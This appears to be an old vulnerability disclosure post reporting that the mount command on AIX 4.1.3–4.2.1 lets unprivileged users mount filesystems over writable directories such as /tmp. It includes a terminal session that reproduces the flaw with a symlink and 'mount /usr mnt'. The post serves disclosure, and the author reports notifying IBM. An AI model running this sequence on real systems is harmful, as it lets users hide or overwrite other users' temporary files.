---------------------------------------------------------------------------- My apologies if this is known already . . . however, I've seen nothing about it and it does concern me. I have verified a problem with mount on AIX 4.1.3, 4.1.4, 4.2.0, and 4.2.1 which allows a normal user to mount any filesystem (including those already mounted by the system) on top of any writable space. Immediately, as the script below shows, this allows a user to overwrite the contents of 777 directories with whatever files one wants. (e.g. Removing access to temporary files in /tmp) . . . sapphire /home/rquick > oslevel sapphire /home/rquick > who am i rquick pts/2 sapphire /home/rquick > id uid=20653(rquick) gid=101(comtec) sapphire /home/rquick > ln -s /tmp mnt sapphire /home/rquick > mount /usr mnt sapphire /home/rquick > cd /tmp sapphire /tmp > ls OV dict include lpd sbin ucb adm dt lbin lpp share usg bin ebt lib man spool ccs eligibility local pub sys common etc lost+found samples tmp sapphire /tmp > cd sapphire /home/rquick > umount mnt sapphire /home/rquick > I have notified IBM of the problem . . . they have yet to respond. S. Ryan Quick ----------------------------------------------------------------------------